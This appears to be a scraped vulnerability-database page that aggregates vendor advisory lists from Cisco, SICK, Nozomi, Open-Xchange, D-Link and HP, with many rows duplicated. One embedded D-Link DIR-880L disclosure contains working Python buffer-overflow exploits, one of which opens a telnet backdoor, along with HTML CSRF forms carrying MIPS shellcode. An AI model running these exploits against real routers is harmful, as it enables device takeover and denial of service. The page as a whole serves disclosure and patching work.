cisco-sa-imp-xss-xqgu4hsg Cisco Unified Communications Manager IM & Presence Service Cross-Site Scripting Vulnerability 2025-09-03T16:00:00+00:00 2025-09-03T16:00:00+00:00
cisco-sa-epnm-pi-stored-xss-xjqzsycp Cisco Evolved Programmable Network Manager and Cisco Prime Infrastructure Stored Cross-Site Scripting Vulnerability 2025-09-03T16:00:00+00:00 2025-09-03T16:00:00+00:00
cisco-sa-epnm-info-dis-zhppmfgz Cisco Evolved Programmable Network Manager and Cisco Prime Infrastructure Information Disclosure Vulnerability 2025-09-03T16:00:00+00:00 2025-09-03T16:00:00+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
sca-2025-0009 Vulnerabilities affecting SICK TDC-E210GC 2025-08-01T13:00:00.000Z 2025-08-01T13:00:00.000Z
sca-2025-0008 Multiple vulnerabilities in Endress+Hauser MEAC300-FNADE4 2025-07-03T13:00:00.000Z 2025-07-03T13:00:00.000Z
sca-2025-0007 Multiple vulnerabilities in SICK Field Analytics and SICK Media Server 2025-06-12T13:00:00.000Z 2025-06-12T13:00:00.000Z
sca-2025-0003 FreeRTOS Vulnerabilities have no impact on SICK Products 2025-02-28T00:00:00.000Z 2025-05-20T11:00:00.000Z
sca-2025-0006 Vulnerability affecting picoScan and multiScan 2025-04-28T13:00:00.000Z 2025-04-28T13:00:00.000Z
sca-2025-0005 Vulnerabilities in SICK Flexi Compact 2025-04-28T10:00:00.000Z 2025-04-28T10:00:00.000Z
sca-2025-0004 Critical vulnerabilities in SICK DL100-2xxxxxxx 2025-03-14T11:00:00.000Z 2025-03-14T11:00:00.000Z
sca-2025-0001 Multiple vulnerabilities in SICK MEAC300 2025-02-14T14:00:00.000Z 2025-02-21T14:00:00.000Z
sca-2025-0002 Vulnerability in SICK Lector8xx and SICK InspectorP8xx 2025-02-14T10:19:00.000Z 2025-02-14T10:19:00.000Z
sca-2024-0007 Vulnerability in SICK OLM 2024-12-31T00:00:00.000Z 2024-12-31T00:00:00.000Z
sca-2024-0006 Critical vulnerabilities in SICK InspectorP61x, InspectorP62x and TiM3xx 2024-12-06T00:00:00.000Z 2024-12-06T00:00:00.000Z
sca-2024-0005 Vulnerability in SICK Incoming Goods Suite 2024-11-19T00:00:00.000Z 2024-11-19T00:00:00.000Z
SCA-2024-0005 Vulnerability in SICK Incoming Goods Suite 2024-11-19T00:00:00.000Z 2024-11-19T00:00:00.000Z
sca-2024-0004 Third party vulnerabilities in SICK CDE-100 2024-11-07T12:00:00.000Z 2024-11-07T12:00:00.000Z
SCA-2024-0004 Third party vulnerabilities in SICK CDE-100 2024-11-07T12:00:00.000Z 2024-11-07T12:00:00.000Z
sca-2024-0003 Critical vulnerability in multiple SICK products 2024-10-17T13:00:00.000Z 2024-10-17T13:00:00.000Z
sca-2024-0002 Vulnerability in SICK MSC800 2024-09-11T23:00:00.000Z 2024-09-11T23:00:00.000Z
sca-2024-0001 Vulnerability in SICK Logistics Analytics Products and SICK Field Analytics 2024-01-29T00:00:00.000Z 2024-01-29T00:00:00.000Z
sca-2023-0011 Vulnerability in multiple SICK Flexi Soft Gateways 2023-10-23T11:00:00.000Z 2023-10-23T11:00:00.000Z
SCA-2023-0011 Vulnerability in multiple SICK Flexi Soft Gateways 2023-10-23T11:00:00.000Z 2023-10-23T11:00:00.000Z
sca-2023-0010 Vulnerabilities in SICK Application Processing Unit 2023-10-09T11:00:00.000Z 2023-10-09T11:00:00.000Z
SCA-2023-0010 Vulnerabilities in SICK Application Processing Unit 2023-10-09T11:00:00.000Z 2023-10-09T11:00:00.000Z
sca-2023-0008 Vulnerability in SICK SIM1012 2023-09-29T13:00:00.000Z 2023-09-29T13:00:00.000Z
SCA-2023-0008 Vulnerability in SICK SIM1012 2023-09-29T13:00:00.000Z 2023-09-29T13:00:00.000Z
sca-2023-0009 Vulnerability in Wibu-Systems CodeMeter Runtime affects multiple SICK products 2023-09-29T10:00:00.000Z 2023-09-29T10:00:00.000Z
SCA-2023-0009 Vulnerability in Wibu-Systems CodeMeter Runtime affects multiple SICK products 2023-09-29T10:00:00.000Z 2023-09-29T10:00:00.000Z
sca-2023-0007 Vulnerabilities in SICK LMS5xx 2023-08-25T11:00:00.000Z 2023-08-25T11:00:00.000Z
SCA-2023-0007 Vulnerabilities in SICK LMS5xx 2023-08-25T11:00:00.000Z 2023-08-25T11:00:00.000Z
sca-2023-0006 Vulnerabilities in SICK ICR890-4 2023-07-10T13:00:00.000Z 2023-07-10T13:00:00.000Z
SCA-2023-0006 Vulnerabilities in SICK ICR890-4 2023-07-10T13:00:00.000Z 2023-07-10T13:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
nn-2025:3-01 Incorrect authorization for traces request/download in CMC before 25.1.0 2025-08-26T11:00:00.000Z 2025-08-26T11:00:00.000Z
nn-2025:2-01 Privilege escalation in Guardian/CMC before 24.6.0 2025-06-10T11:00:00.000Z 2025-06-10T11:00:00.000Z
nn-2025:1-01 Authenticated RCE in update functionality in Guardian/CMC before 24.6.0 2025-06-10T11:00:00.000Z 2025-06-10T11:00:00.000Z
nn-2024_2-01 Incorrect authorization for Reports configuration in Guardian/CMC before 24.2.0 2024-09-11T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2024_1-01 DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2024:2-01 Incorrect authorization for Reports configuration in Guardian/CMC before 24.2.0 2024-09-11T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2024:1-01 DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_9-01 Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_8-01 Session Fixation in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_7-01 DoS via SAML configuration in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_6-01 Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_4-01 Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_3-01 Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_2-01 Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_17-01 Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_15-01 Sensitive data exfiltration via unsafe permissions on Windows systems in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_12-01 Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0 2024-01-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_11-01 SQL Injection on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_10-01 DoS on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:9-01 Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:8-01 Session Fixation in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:7-01 DoS via SAML configuration in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:6-01 Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:4-01 Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:3-01 Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:2-01 Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:17-01 Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:15-01 Sensitive data exfiltration via unsafe permissions on Windows systems in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:12-01 Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0 2024-01-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:11-01 SQL Injection on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
oxas-adv-2025-0001 OX App Suite Security Advisory OXAS-ADV-2025-0001 2025-01-27T00:00:00+01:00 2025-04-07T00:00:00+00:00
oxdc-adv-2024-0003 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0003 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
oxdc-adv-2024-0002 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0002 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
OXDC-ADV-2024-0003 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0003 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
OXDC-ADV-2024-0002 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0002 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
oxas-adv-2024-0005 OX App Suite Security Advisory OXAS-ADV-2024-0005 2024-07-08T00:00:00+02:00 2024-09-09T00:00:00+00:00
OXAS-ADV-2024-0005 OX App Suite Security Advisory OXAS-ADV-2024-0005 2024-07-08T00:00:00+02:00 2024-09-09T00:00:00+00:00
oxdc-adv-2024-0001 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0001 2024-09-02T00:00:00+02:00 2024-09-06T00:00:00+00:00
OXDC-ADV-2024-0001 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0001 2024-09-02T00:00:00+02:00 2024-09-06T00:00:00+00:00
oxas-adv-2024-0004 OX App Suite Security Advisory OXAS-ADV-2024-0004 2024-06-13T00:00:00+02:00 2024-08-19T00:00:00+00:00
oxas-adv-2024-0003 OX App Suite Security Advisory OXAS-ADV-2024-0003 2024-04-24T00:00:00+02:00 2024-08-19T00:00:00+00:00
OXAS-ADV-2024-0004 OX App Suite Security Advisory OXAS-ADV-2024-0004 2024-06-13T00:00:00+02:00 2024-08-19T00:00:00+00:00
OXAS-ADV-2024-0003 OX App Suite Security Advisory OXAS-ADV-2024-0003 2024-04-24T00:00:00+02:00 2024-08-19T00:00:00+00:00
oxas-adv-2024-0002 OX App Suite Security Advisory OXAS-ADV-2024-0002 2024-03-06T00:00:00+01:00 2024-05-06T00:00:00+00:00
OXAS-ADV-2024-0002 OX App Suite Security Advisory OXAS-ADV-2024-0002 2024-03-06T00:00:00+01:00 2024-05-06T00:00:00+00:00
oxas-adv-2024-0001 OX App Suite Security Advisory OXAS-ADV-2024-0001 2024-02-08T00:00:00+01:00 2024-04-25T00:00:00+00:00
OXAS-ADV-2024-0001 OX App Suite Security Advisory OXAS-ADV-2024-0001 2024-02-08T00:00:00+01:00 2024-04-25T00:00:00+00:00
oxas-adv-2023-0007 OX App Suite Security Advisory OXAS-ADV-2023-0007 2023-12-11T00:00:00+01:00 2024-02-16T00:00:00+00:00
OXAS-ADV-2023-0007 OX App Suite Security Advisory OXAS-ADV-2023-0007 2023-12-11T00:00:00+01:00 2024-02-16T00:00:00+00:00
oxas-adv-2023-0006 OX App Suite Security Advisory OXAS-ADV-2023-0006 2023-09-25T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0005 OX App Suite Security Advisory OXAS-ADV-2023-0005 2023-09-19T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0004 OX App Suite Security Advisory OXAS-ADV-2023-0004 2023-08-01T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0003 OX App Suite Security Advisory OXAS-ADV-2023-0003 2023-05-02T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0002 OX App Suite Security Advisory OXAS-ADV-2023-0002 2023-03-20T00:00:00+01:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0001 OX App Suite Security Advisory OXAS-ADV-2023-0001 2023-02-06T00:00:00+01:00 2024-01-22T00:00:00+00:00
oxas-adv-2022-0002 OX App Suite Security Advisory OXAS-ADV-2022-0002 2022-11-02T00:00:00+01:00 2024-01-22T00:00:00+00:00
oxas-adv-2022-0001 OX App Suite Security Advisory OXAS-ADV-2022-0001 2022-08-10T00:00:00+02:00 2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0006 OX App Suite Security Advisory OXAS-ADV-2023-0006 2023-09-25T00:00:00+02:00 2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0005 OX App Suite Security Advisory OXAS-ADV-2023-0005 2023-09-19T00:00:00+02:00 2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0004 OX App Suite Security Advisory OXAS-ADV-2023-0004 2023-08-01T00:00:00+02:00 2024-01-22T00:00:00+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
var-202411-1650 D-LINK DI-8400 v16.07.26A1 was discovered to contain multiple remote command execution (RCE) vulnerabilities in the msp_info_htm function via the flag and cmd parameters. D-LINK DI-8400 is a router device from D-Link, USA, used for home and small business network connections. Remote attackers can exploit this vulnerability to execute arbitrary commands
var-202411-1640 Linksys E3000 is a powerful dual-band Wireless-N router from Linksys, an American company. There is a security vulnerability in diag_ping_start of Linksys E3000. A remote attacker can use this vulnerability to submit special requests and execute arbitrary commands in the context of the application.
var-202411-0543 A vulnerability has been identified in SIMATIC S7-PLCSIM V16 (All versions), SIMATIC S7-PLCSIM V17 (All versions), SIMATIC STEP 7 Safety V16 (All versions), SIMATIC STEP 7 Safety V17 (All versions < V17 Update 8), SIMATIC STEP 7 Safety V18 (All versions < V18 Update 5), SIMATIC STEP 7 V16 (All versions), SIMATIC STEP 7 V17 (All versions < V17 Update 8), SIMATIC STEP 7 V18 (All versions < V18 Update 5), SIMATIC WinCC Unified V16 (All versions), SIMATIC WinCC Unified V17 (All versions < V17 Update 8), SIMATIC WinCC Unified V18 (All versions < V18 Update 5), SIMATIC WinCC V16 (All versions), SIMATIC WinCC V17 (All versions < V17 Update 8), SIMATIC WinCC V18 (All versions < V18 Update 5), SIMOCODE ES V16 (All versions), SIMOCODE ES V17 (All versions < V17 Update 8), SIMOCODE ES V18 (All versions), SIMOTION SCOUT TIA V5.4 SP1 (All versions), SIMOTION SCOUT TIA V5.4 SP3 (All versions), SIMOTION SCOUT TIA V5.5 SP1 (All versions), SINAMICS Startdrive V16 (All versions), SINAMICS Startdrive V17 (All versions), SINAMICS Startdrive V18 (All versions), SIRIUS Safety ES V17 (All versions < V17 Update 8), SIRIUS Safety ES V18 (All versions), SIRIUS Soft Starter ES V17 (All versions < V17 Update 8), SIRIUS Soft Starter ES V18 (All versions), TIA Portal Cloud V16 (All versions), TIA Portal Cloud V17 (All versions < V4.6.0.1), TIA Portal Cloud V18 (All versions < V4.6.1.0). Affected products do not properly sanitize user-controllable input when parsing user settings. This could allow an attacker to cause a type confusion and execute arbitrary code within the affected application. SIMATIC S7-PLCSIM simulates S7-1200, S7-1500 and some other PLC derivatives, shipped as part of SIMATIC STEP 7. SIMATIC step7 (TIA Portal) is an engineering software for configuring and programming SIMATIC controllers. simmocode ES is the core software package for simmocode pro configuration, commissioning, operation and diagnostics. SINAMICS Startdrive commissioning software is the engineering tool for integrating SINAMICS drives in TIA Portal. TIA Portal is a PC software that provides the full range of Siemens digital automation services from digital planning and integrated engineering to transparent operation. TIA Portal Cloud makes it possible to use the main package and main option package of TIA Portal in a virtualized environment
var-201507-0645 D-Link is an internationally renowned provider of network equipment and solutions, including a variety of router equipment. D-Link is a D-Link company dedicated to the research, development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. A buffer overflow vulnerability exists in D-Link due to the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected device and may also cause a denial of service. The following products are affected: D-Link Ethernet Broadband Router. Failed exploits may result in denial-of-service conditions. ## Advisory Information Title: DIR-880L Buffer overflows in authenticatio and HNAP functionalities. Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-880L -- Wireless AC1900 Dual-Band Gigabit Cloud Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices. ## Details Buffer overflow in HNAP ---------------------------------------------------------------------------------------------------------------------- import socket import struct #Currently the address of exit function in libraray used as $PC buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220 buf+= "\r\n" + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- Buffer overflow in auth ---------------------------------------------------------------------------------------------------------------------- import socket import struct buf = "GET /webfa_authentication.cgi?id=" buf+="A"*408 buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack buf+="sh;#"+"CCCC"+"DDDD" #R0-R2 buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley (samhuntley84@gmail.com) . ## Details # Ping buffer oberflow ---------------------------------------------------------------------------------------------------------------------- <!-- reboot shellcode Big Endian MIPS--> <html> <body> <form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/ping_response.cgi"> <input type="text" id="html_response_page" name="html_response_page" value="tools_vct.asp&html_response_return_page=tools_vct.asp&action=ping_test&ping_ipaddr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%2A%BF%99%F4%2A%C1%1C%30AAAA%2A%BF%8F%04CCCC%2A%BC%9B%9CEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE%2A%BC%BD%90FFFFFFFFFFFFFFFF%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0c&ping=ping"></td> <input type=submit value="submit"> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------- # Send email buffer overflow ---------------------------------------------------------------------------------------------------------------------- <!-- reboot shellcode Big Endian MIPS--> <html> <body> <form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/send_log_email.cgi"> <input type="text" id="auth_active" name="auth_active" value="testy)%3b&log_email_from=test@test.com&auth_acname=sweetBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBIIII%2A%BF%99%F4%2A%C1%1C%30FFFF%2A%BF%8F%04DDDDCCCCBBBB%2A%BC%9B%9CCCC&auth_passwd=test1)&log_email_server=mail.google.com%3breboat%3b%23%23testAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&log_email_port=25&log_email_sender=ses@gmail.com%3brebolt%3b%23%23teYYYY%2A%BC%BD%90AAAAAAAAAAAAtest%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0cAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&model_name=test&action=send_log_email&test=test"></td> <input type=submit value="submit"> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline
var-201807-0341 ABB Panel Builder 800 all versions has an improper input validation vulnerability which may allow an attacker to insert and run arbitrary code on a computer where the affected product is used. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of the IpAddress parameters of the ABB BeMMS OPC Driver. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code under the context of an administrator. ABB Panel Builder 800 is a web-based HMI (Human Machine Interface) system from ABB, Switzerland. Failed exploit attempts will result in denial-of-service conditions
var-202411-1422 D-Link DI-8200 16.07.26A1 is vulnerable to remote command execution in the msp_info_htm function via the flag parameter and cmd parameter. D-Link Systems, Inc. of di-8200 Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. D-Link DI-8200 is an enterprise-class router from D-Link, a Chinese company. No detailed vulnerability details are currently available
var-202411-1539 D-LINK DI-8003 v16.07.26A1 was discovered to contain a buffer overflow via the host_ip parameter in the ipsec_road_asp function. D-Link Systems, Inc. of di-8003 An out-of-bounds write vulnerability exists in firmware.Service operation interruption (DoS) It may be in a state. D-LINK DI-8003 is a router product produced by D-LINK. No detailed vulnerability details are currently provided
var-201103-0371 SAP Crystal Reports Server is a complete reporting solution for creating, managing, and delivering reports through the web or embedded enterprise applications. There is an input validation error in SAP Crystal Reports Server. The input passed to aa-open-inlist.jsp via the \"url\", \"sWindow\", \"BEGIN_DATE\", \"END_DATE\", \"CURRENT_DATE\" and \"CURRENT_SLICE\" parameters is missing before returning to the user. Filtering can lead to cross-site scripting attacks
var-202410-3364 In TP-Link TL-WDR7660 v1.0, the guestRuleJsonToBin function handles the parameter string name without checking it, which can lead to stack overflow vulnerabilities. TP-LINK TL-WDR7660 is a Gigabit router from TP-LINK of China. TP-LINK TL-WDR7660 version 1.0 has a buffer overflow vulnerability. Attackers can exploit this vulnerability to execute arbitrary code on the system or cause a denial of service
var-202411-1441 D-LINK DI-8003 v16.07.16A1 was discovered to contain a buffer overflow via the notify parameter in the arp_sys_asp function. D-Link Systems, Inc. of di-8003 An out-of-bounds write vulnerability exists in firmware.Service operation interruption (DoS) It may be in a state. D-Link DI-8400 is a wireless router from D-Link, a Chinese company. D-Link DI-8400 arp_sys_asp has a buffer overflow vulnerability, which can be exploited by remote attackers to submit special requests, causing the service program to crash or execute arbitrary code in the context of the application
var-201112-0173 The default configuration of the HP CM8060 Color MFP with Edgeline; Color LaserJet 3xxx, 4xxx, 5550, 9500, CMxxxx, CPxxxx, and Enterprise CPxxxx; Digital Sender 9200c and 9250c; LaserJet 4xxx, 5200, 90xx, Mxxxx, and Pxxxx; and LaserJet Enterprise 500 color M551, 600, M4555 MFP, and P3015 enables the Remote Firmware Update (RFU) setting, which allows remote attackers to execute arbitrary code by using a session on TCP port 9100 to upload a crafted firmware update. A vulnerability in certain Hewlett-Packard devices could allow a remote attacker to install unauthorized firmware on an affected system. HP Printers and Digital Senders are prone to a security-bypass vulnerability. The unauthorized firmware could also cause a Denial of Service to the device. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03102449 Version: 3 HPSBPI02728 SSRT100692 rev.3 - Certain HP Printers and HP Digital Senders, Remote Firmware Update Enabled by Default NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2011-11-30 Last Updated: 2012-01-09 Potential Security Impact: Remote firmware update enabled by default Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with certain HP printers and HP digital senders. References: CVE-2011-4161 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Please refer to the RESOLUTION below for a list of impacted products. A firmware update can be sent remotely to port 9100 without authentication. RESOLUTION The following steps can be taken to avoid unauthorized firmware updates: Update the firmware to a version that implements code signing Disable the Remote Firmware Update The code signing feature verifies that firmware updates are properly signed. This will prevent the installation of invalid firmware updates. Note: A firmware update may be required to allow the RFU to be disabled or to implement code signing. Code signing is not available on all the affected devices. Please refer to the following table. Firmware updates for any of the products can also be downloaded as follows. Browse to www.hp.com/go/support then: Select "Drivers & Software" Enter the product name listed in the table above into the search field Click on "Search" If the search returns a list of products click on the appropriate product Under "Select operating system" click on "Cross operating system (BIOS, Firmware, Diagnostics, etc.)" If the "Cross operating system ..." link is not present, select any Windows operating system from the list. Select the appropriate firmware update under "Firmware" HISTORY Version:1 (rev.1) - 30 November 2011 Initial release Version:2 (rev.2) - 23 December 2011 Code signing firmware available Version:3 (rev.3) - 9 January 2012 Combined tables Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) 